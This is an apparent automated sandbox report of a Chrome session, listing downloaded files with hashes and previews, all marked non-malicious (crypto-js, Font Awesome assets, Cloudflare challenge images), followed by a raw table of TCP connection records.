                                                                          SHA1:DD570A24C8BDA1B391AA1DDEA6004125818E579A
                                                                          SHA-256:5B75AC6F98994352699841DFFA6E562725EBBD0005C539946AD3625EC550EB0F
                                                                          SHA-512:3F06DFBFDEDE9BB4270EB1BBBE29FFBDB6E19DC0AA8234E1A2B92D84F0737555031231965151EFC386510193343985BCEC63062484BBD8EC0540A94A0109B765
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:"use strict";(function(){function Wt(e,r,n,o,c,l,h){try{var p=e[l](h),f=p.value}catch(s){n(s);return}p.done?r(f):Promise.resolve(f).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function h(f){Wt(l,o,c,h,p,"next",f)}function p(f){Wt(l,o,c,h,p,"throw",f)}h(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):47992
                                                                          Entropy (8bit):5.605846858683577
                                                                          Encrypted:false
                                                                          SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                          MD5:CF3402D7483B127DED4069D651EA4A22
                                                                          SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                          SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                          SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 16 x 43, 8-bit/color RGB, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):61
                                                                          Entropy (8bit):4.068159130770306
                                                                          Encrypted:false
                                                                          SSDEEP:3:yionv//thPl9UtttKxl/k4E08up:6v/lhP0ttA7Tp
                                                                          MD5:30AB6176F835ACCC93A3E26AB7948975
                                                                          SHA1:4399DBE0E91F11747C86057D66B47814595B12F9
                                                                          SHA-256:5519D06A13698BCBC92B01E9A8FFE9735AE34E0A62478D9D96F5B81C0B4EA96C
                                                                          SHA-512:AC99087969C47E2AE5AAE82B26658607C8FC5FBFBB26617BFDD0C911D774E559F9EBBD4DEB20C44984439687FF61CA020F1AE17AEEC1338C6DEF2DFB6CCF312D
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR.......+......,.X....IDAT.....$.....IEND.B`.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):61
                                                                          Entropy (8bit):3.990210155325004
                                                                          Encrypted:false
                                                                          SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JSON data
                                                                          Category:downloaded
                                                                          Size (bytes):41
                                                                          Entropy (8bit):3.9156150417214075
                                                                          Encrypted:false
                                                                          SSDEEP:3:YGKXjHUHLKFjJ4:YGKXrAKZJ4
                                                                          MD5:3EFFE2A312A0C73BC5B9AD4F8CF9EAEA
                                                                          SHA1:1CB6AF571A3AABA57E8C43A17CD0A18368F25268
                                                                          SHA-256:AF5BF38F026402D7BEE2958FCEC01D934ACE815CEF3320AC7CD2CDD02242D884
                                                                          SHA-512:AD5C147948BC81D86F10276926FD33BB688662BF962DE71B516BCEA92E70D7DD199065148122313D5E1FDB2A4687C7FD2CF35DB1213136EC63E8D75330BA320B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/favicon.ico
                                                                          Preview:{"code":"NotFound","message":"Not Found"}
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 16 x 43, 8-bit/color RGB, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):61
                                                                          Entropy (8bit):4.068159130770306
                                                                          Encrypted:false
                                                                          SSDEEP:3:yionv//thPl9UtttKxl/k4E08up:6v/lhP0ttA7Tp
                                                                          MD5:30AB6176F835ACCC93A3E26AB7948975
                                                                          SHA1:4399DBE0E91F11747C86057D66B47814595B12F9
                                                                          SHA-256:5519D06A13698BCBC92B01E9A8FFE9735AE34E0A62478D9D96F5B81C0B4EA96C
                                                                          SHA-512:AC99087969C47E2AE5AAE82B26658607C8FC5FBFBB26617BFDD0C911D774E559F9EBBD4DEB20C44984439687FF61CA020F1AE17AEEC1338C6DEF2DFB6CCF312D
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8da452d5f8116bbc/1730217053320/7BL7LlnT3QR8G8z
                                                                          Preview:.PNG........IHDR.......+......,.X....IDAT.....$.....IEND.B`.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:data
                                                                          Category:downloaded
                                                                          Size (bytes):18859
                                                                          Entropy (8bit):7.989976718006013
                                                                          Encrypted:false
                                                                          SSDEEP:384:HLnt8g5pj5Vph1UBroc7VmGkoV+bEU1aGXWMpD4AHNGi8Jt7:rnpzVVpvUBzmHooEBMKA0Dt7
                                                                          MD5:D1636C4244586A3DBE1AE6F51FB3223A
                                                                          SHA1:C4E549BEE3F083F286449962F235C3E790910B9D
                                                                          SHA-256:FB6F92C5BA5FA5D7741EE20539322689F35AB9E9AED7D2FAB599E7801A2A3D60
                                                                          SHA-512:1C52316B4F8FD1D4579C5A0A28E5B90DCD372DDC6A838CFF621A4541D9AB865D7A382F63B7218D6540306248261E3CB502E9A077BCFD4798DE3C86F6B2F54FA3
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
                                                                          Preview:..Q.l..B.m$B.8@....@......K...qc.5!...K.....S......-.!..P7..l<y..oL..,....{.B..9.n..$...6.F&).L.L.....".L...iO(A.\Zf.i...V.4.........-.+j1.-5+...y...<...l'....j.K....]...bB.ZZo3^Z....<..........I...M....j&.eE...b.....3.&.K..q.....PO.....QYi..k.(....0...=k.0..#4Z9.'.?..;37_LQK..3.,...G..j ..*f!.....w........#.6..(.H..c.s..p.k.....#..PV..L}...................j...{.;.#..~..NC..0D#!Bh.).........$......k...,...^}.Q...........D. ....e....v.'6C.Z.:.[...N..{p.....2e..~.ut....=.Z!f...H.(.../w).r.6..ziGf;C.S.t.....[...*.......>.....s.$rf..).....%>19.K.,A...~^..2.N:...&@[...@..^.$..X.+$B...v..o.q.b...Z.A..3...c2 .].'%..5O...+a..8.4..N.|....Y..Jm......}...;.y...e.(....r...a.7..:....I.......t.. .X..<...A.@..."...x.>(B.X.S.._DJ......JR.:.H..H.).[..+..d....<,<.y..4iJ...b(~I^..:..\..KNtR.%.$.E..... ..c.Y;..4...$A.i...8.M.+....YF..h..4...., 4...48..y...9.$.w.w.J.......\..J.==.5.r-t.Z0R.#..W..u....-..../.m...#......Omt.DX.Yo...K%...D.2..$.$t.7.3...^..l
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 156532, version 773.256
                                                                          Category:downloaded
                                                                          Size (bytes):156532
                                                                          Entropy (8bit):7.996386572265519
                                                                          Encrypted:true
                                                                          SSDEEP:1536:HrPC5zUBeCGcReONEpKZZbwEPvdThY0E2eXOtr9pVhw+J3E6gbzlPAzJ+Zn+PMY6:TC5oNnZbwC9Wie+B9pVSeE6dMZnaBi
                                                                          MD5:D465BCCB9EDF0873F021F66D4B09D89C
                                                                          SHA1:214F3C71DE28C682602AECD39E9AD2BBA15F1B0C
                                                                          SHA-256:F4C5A5B297E623BC159679563A4D1EB16E409CA3B57698FBC00FD2C907DADAE0
                                                                          SHA-512:35D7523F48386E89B1CAD6A47DF65D64415AB9C45E6425BB4AB25AC9510F6D2E9DE3D7CAD79C2491660E885D7A38D3FFA9E93EB50AE045FBD072DEAF114E10B8
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2
                                                                          Preview:wOF2......ct.......A..c(.........................6.$. .`..<......\.@..m. % ....PX.....6.F.h.....^.......f%.....*..~.....W.........7...../.....?.....q...i........h..s'@.I...D...V.F.)(V..`.7.B....u....J...I.U..9E..`M...Zf......R.&.t&&.j....-..$...";.:...9... .3;...8...j%.'.@....>=.Hbdj..W.@.<].'7..`..tja~.X.<<....O..@./)x."A..6.....A..V+...^.t[p.a.A............N.>ilUN.@ek..^ .U.%....E ...pz&..M..^5TWwAc.d.....C......6Y...y...e../f.P..:...v..._B..zBOO.......f7cv....;.\..`:.1. .bHZ.."E.T$E.5iE...y.e..)."..m...Cz{..Yr....?ij....W.UH.....P@w...h.:.."..I+..DR.-(Q....4r...(.R;HCg8.aw{.I..c8..,{..L.5......R..g.{.g.'..<...........X....G.H$E..(0H.).A..e.B..).2O.l..2..Z....I.g...L9Hr..y~...\......4...x.....x.&.!?....M&ix..E....7.'):K..l.R.......K.%R .x.m...f..Wr...)...{.....n9W.........=H....5J.=b...$BT.Q....$`.....3..UT..<....K..KM$._O.S....a........p....%S8.S.Na.....2.F.U.\.....|.._.h.;.}L.....Y.Z..!..S.N.*EG]..<_k.Y.}.!t/.<U.....:......P`B..4.B......
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):47992
                                                                          Entropy (8bit):5.605846858683577
                                                                          Encrypted:false
                                                                          SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                          MD5:CF3402D7483B127DED4069D651EA4A22
                                                                          SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                          SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                          SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):61
                                                                          Entropy (8bit):3.990210155325004
                                                                          Encrypted:false
                                                                          SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                          No static file info
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Oct 29, 2024 16:50:41.712459087 CET49673443192.168.2.16204.79.197.203
                                                                          Oct 29, 2024 16:50:42.015074968 CET49673443192.168.2.16204.79.197.203
                                                                          Oct 29, 2024 16:50:42.619072914 CET49673443192.168.2.16204.79.197.203
                                                                          Oct 29, 2024 16:50:43.538506031 CET49698443192.168.2.16172.67.7.211
                                                                          Oct 29, 2024 16:50:43.538551092 CET44349698172.67.7.211192.168.2.16
                                                                          Oct 29, 2024 16:50:43.538636923 CET49698443192.168.2.16172.67.7.211
                                                                          Oct 29, 2024 16:50:43.539005041 CET49699443192.168.2.16172.67.7.211
                                                                          Oct 29, 2024 16:50:43.539052963 CET44349699172.67.7.211192.168.2.16
                                                                          Oct 29, 2024 16:50:43.539165974 CET49698443192.168.2.16172.67.7.211
                                                                          Oct 29, 2024 16:50:43.539180994 CET44349698172.67.7.211192.168.2.16
                                                                          Oct 29, 2024 16:50:43.539201975 CET49699443192.168.2.16172.67.7.211
                                                                          Oct 29, 2024 16:50:43.539362907 CET49699443192.168.2.16172.67.7.211
                                                                          Oct 29, 2024 16:50:43.539380074 CET44349699172.67.7.211192.168.2.16
                                                                          Oct 29, 2024 16:50:43.827079058 CET49673443192.168.2.16204.79.197.203
                                                                          Oct 29, 2024 16:50:44.145586967 CET44349699172.67.7.211192.168.2.16
                                                                          Oct 29, 2024 16:50:44.145837069 CET49699443192.168.2.16172.67.7.211
                                                                          Oct 29, 2024 16:50:44.145854950 CET44349699172.67.7.211192.168.2.16
                                                                          Oct 29, 2024 16:50:44.146967888 CET44349699172.67.7.211192.168.2.16
                                                                          Oct 29, 2024 16:50:44.147053003 CET49699443192.168.2.16172.67.7.211
                                                                          Oct 29, 2024 16:50:44.148256063 CET49699443192.168.2.16172.67.7.211
                                                                          Oct 29, 2024 16:50:44.148327112 CET44349699172.67.7.211192.168.2.16
                                                                          Oct 29, 2024 16:50:44.148446083 CET49699443192.168.2.16172.67.7.211
                                                                          Oct 29, 2024 16:50:44.148452997 CET44349699172.67.7.211192.168.2.16
                                                                          Oct 29, 2024 16:50:44.185887098 CET44349698172.67.7.211192.168.2.16
                                                                          Oct 29, 2024 16:50:44.186103106 CET49698443192.168.2.16172.67.7.211
                                                                          Oct 29, 2024 16:50:44.186117887 CET44349698172.67.7.211192.168.2.16
                                                                          Oct 29, 2024 16:50:44.187222004 CET44349698172.67.7.211192.168.2.16
                                                                          Oct 29, 2024 16:50:44.187289000 CET49698443192.168.2.16172.67.7.211
                                                                          Oct 29, 2024 16:50:44.187623024 CET49698443192.168.2.16172.67.7.211
                                                                          Oct 29, 2024 16:50:44.187686920 CET44349698172.67.7.211192.168.2.16
                                                                          Oct 29, 2024 16:50:44.192060947 CET49699443192.168.2.16172.67.7.211
                                                                          Oct 29, 2024 16:50:44.242386103 CET49698443192.168.2.16172.67.7.211
                                                                          Oct 29, 2024 16:50:44.242400885 CET44349698172.67.7.211192.168.2.16
                                                                          Oct 29, 2024 16:50:44.289081097 CET49698443192.168.2.16172.67.7.211
                                                                          Oct 29, 2024 16:50:44.506788015 CET44349699172.67.7.211192.168.2.16
                                                                          Oct 29, 2024 16:50:44.506958008 CET44349699172.67.7.211192.168.2.16
                                                                          Oct 29, 2024 16:50:44.507035017 CET49699443192.168.2.16172.67.7.211
                                                                          Oct 29, 2024 16:50:44.507708073 CET49699443192.168.2.16172.67.7.211
                                                                          Oct 29, 2024 16:50:44.507721901 CET44349699172.67.7.211192.168.2.16
                                                                          Oct 29, 2024 16:50:44.798871994 CET49701443192.168.2.16107.161.183.172
                                                                          Oct 29, 2024 16:50:44.798914909 CET44349701107.161.183.172192.168.2.16
                                                                          Oct 29, 2024 16:50:44.798986912 CET49701443192.168.2.16107.161.183.172
                                                                          Oct 29, 2024 16:50:44.799294949 CET49701443192.168.2.16107.161.183.172
                                                                          Oct 29, 2024 16:50:44.799307108 CET44349701107.161.183.172192.168.2.16
                                                                          Oct 29, 2024 16:50:45.262296915 CET4968980192.168.2.16192.229.211.108
                                                                          Oct 29, 2024 16:50:45.491744995 CET44349701107.161.183.172192.168.2.16
                                                                          Oct 29, 2024 16:50:45.492105007 CET49701443192.168.2.16107.161.183.172
                                                                          Oct 29, 2024 16:50:45.492120981 CET44349701107.161.183.172192.168.2.16
                                                                          Oct 29, 2024 16:50:45.493166924 CET44349701107.161.183.172192.168.2.16
                                                                          Oct 29, 2024 16:50:45.493247986 CET49701443192.168.2.16107.161.183.172
                                                                          Oct 29, 2024 16:50:45.494163036 CET49701443192.168.2.16107.161.183.172
                                                                          Oct 29, 2024 16:50:45.494234085 CET44349701107.161.183.172192.168.2.16
                                                                          Oct 29, 2024 16:50:45.494347095 CET49701443192.168.2.16107.161.183.172
                                                                          Oct 29, 2024 16:50:45.494355917 CET44349701107.161.183.172192.168.2.16
                                                                          Oct 29, 2024 16:50:45.543143034 CET49701443192.168.2.16107.161.183.172
                                                                          Oct 29, 2024 16:50:45.753281116 CET44349701107.161.183.172192.168.2.16
                                                                          Oct 29, 2024 16:50:45.753474951 CET44349701107.161.183.172192.168.2.16
                                                                          Oct 29, 2024 16:50:45.753537893 CET49701443192.168.2.16107.161.183.172
                                                                          Oct 29, 2024 16:50:45.753763914 CET49701443192.168.2.16107.161.183.172
                                                                          Oct 29, 2024 16:50:45.753774881 CET44349701107.161.183.172192.168.2.16
                                                                          Oct 29, 2024 16:50:45.753787994 CET49701443192.168.2.16107.161.183.172
                                                                          Oct 29, 2024 16:50:45.753823996 CET49701443192.168.2.16107.161.183.172
                                                                          Oct 29, 2024 16:50:45.912162066 CET49706443192.168.2.16217.142.168.1
                                                                          Oct 29, 2024 16:50:45.912200928 CET44349706217.142.168.1192.168.2.16
                                                                          Oct 29, 2024 16:50:45.912321091 CET49706443192.168.2.16217.142.168.1
                                                                          Oct 29, 2024 16:50:45.912592888 CET49706443192.168.2.16217.142.168.1
                                                                          Oct 29, 2024 16:50:45.912606001 CET44349706217.142.168.1192.168.2.16
                                                                          Oct 29, 2024 16:50:46.241070032 CET49673443192.168.2.16204.79.197.203
                                                                          Oct 29, 2024 16:50:47.316199064 CET44349706217.142.168.1192.168.2.16
                                                                          Oct 29, 2024 16:50:47.316654921 CET49706443192.168.2.16217.142.168.1
                                                                          Oct 29, 2024 16:50:47.316669941 CET44349706217.142.168.1192.168.2.16
                                                                          Oct 29, 2024 16:50:47.317725897 CET44349706217.142.168.1192.168.2.16
                                                                          Oct 29, 2024 16:50:47.317811012 CET49706443192.168.2.16217.142.168.1
                                                                          Oct 29, 2024 16:50:47.318733931 CET49706443192.168.2.16217.142.168.1
                                                                          Oct 29, 2024 16:50:47.318804026 CET44349706217.142.168.1192.168.2.16
                                                                          Oct 29, 2024 16:50:47.318919897 CET49706443192.168.2.16217.142.168.1
                                                                          Oct 29, 2024 16:50:47.318929911 CET44349706217.142.168.1192.168.2.16
                                                                          Oct 29, 2024 16:50:47.368127108 CET49706443192.168.2.16217.142.168.1
                                                                          Oct 29, 2024 16:50:47.401511908 CET49708443192.168.2.16172.217.16.132
                                                                          Oct 29, 2024 16:50:47.401602983 CET44349708172.217.16.132192.168.2.16
                                                                          Oct 29, 2024 16:50:47.401707888 CET49708443192.168.2.16172.217.16.132
                                                                          Oct 29, 2024 16:50:47.401942968 CET49708443192.168.2.16172.217.16.132
                                                                          Oct 29, 2024 16:50:47.401976109 CET44349708172.217.16.132192.168.2.16
                                                                          Oct 29, 2024 16:50:47.662703037 CET44349706217.142.168.1192.168.2.16
                                                                          Oct 29, 2024 16:50:47.662805080 CET44349706217.142.168.1192.168.2.16
                                                                          Oct 29, 2024 16:50:47.662853956 CET44349706217.142.168.1192.168.2.16
                                                                          Oct 29, 2024 16:50:47.662939072 CET49706443192.168.2.16217.142.168.1
                                                                          Oct 29, 2024 16:50:47.662959099 CET44349706217.142.168.1192.168.2.16
                                                                          Oct 29, 2024 16:50:47.663007975 CET44349706217.142.168.1192.168.2.16
                                                                          Oct 29, 2024 16:50:47.663048029 CET49706443192.168.2.16217.142.168.1
                                                                          Oct 29, 2024 16:50:47.663124084 CET49706443192.168.2.16217.142.168.1
                                                                          Oct 29, 2024 16:50:47.663749933 CET49706443192.168.2.16217.142.168.1
                                                                          Oct 29, 2024 16:50:47.663779974 CET44349706217.142.168.1192.168.2.16
                                                                          Oct 29, 2024 16:50:47.744847059 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:47.744869947 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:47.744937897 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:47.745110989 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:47.745119095 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:47.746906996 CET49710443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:47.746916056 CET44349710104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:47.746985912 CET49710443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:47.747154951 CET49710443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:47.747164011 CET44349710104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:48.271038055 CET44349708172.217.16.132192.168.2.16
                                                                          Oct 29, 2024 16:50:48.272082090 CET49708443192.168.2.16172.217.16.132
                                                                          Oct 29, 2024 16:50:48.272099018 CET44349708172.217.16.132192.168.2.16
                                                                          Oct 29, 2024 16:50:48.273133039 CET44349708172.217.16.132192.168.2.16
                                                                          Oct 29, 2024 16:50:48.273204088 CET49708443192.168.2.16172.217.16.132
                                                                          Oct 29, 2024 16:50:48.274440050 CET49708443192.168.2.16172.217.16.132
                                                                          Oct 29, 2024 16:50:48.274502993 CET44349708172.217.16.132192.168.2.16
                                                                          Oct 29, 2024 16:50:48.319097996 CET49708443192.168.2.16172.217.16.132
                                                                          Oct 29, 2024 16:50:48.319111109 CET44349708172.217.16.132192.168.2.16
                                                                          Oct 29, 2024 16:50:48.367099047 CET49708443192.168.2.16172.217.16.132
                                                                          Oct 29, 2024 16:50:48.442359924 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.442718029 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.442742109 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.443778992 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.443880081 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.445038080 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.445102930 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.445198059 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.454260111 CET44349710104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:48.454478979 CET49710443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:48.454495907 CET44349710104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:48.455529928 CET44349710104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:48.455610037 CET49710443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:48.456481934 CET49710443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:48.456545115 CET44349710104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:48.456608057 CET49710443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:48.456619024 CET44349710104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:48.491328955 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.495112896 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.495158911 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.510097980 CET49710443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:48.541121006 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.585589886 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.585644960 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.585671902 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.585725069 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.585731983 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.585751057 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.585804939 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.586167097 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.586440086 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.586491108 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.586500883 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.586606979 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.586612940 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.604525089 CET44349710104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:48.604650021 CET44349710104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:48.604779005 CET49710443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:48.606077909 CET49710443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:48.606093884 CET44349710104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:48.609920025 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:48.609956026 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:48.610157967 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:48.610446930 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:48.610460043 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:48.636085987 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.636096954 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.683140993 CET49709443192.168.2.16104.17.25.14
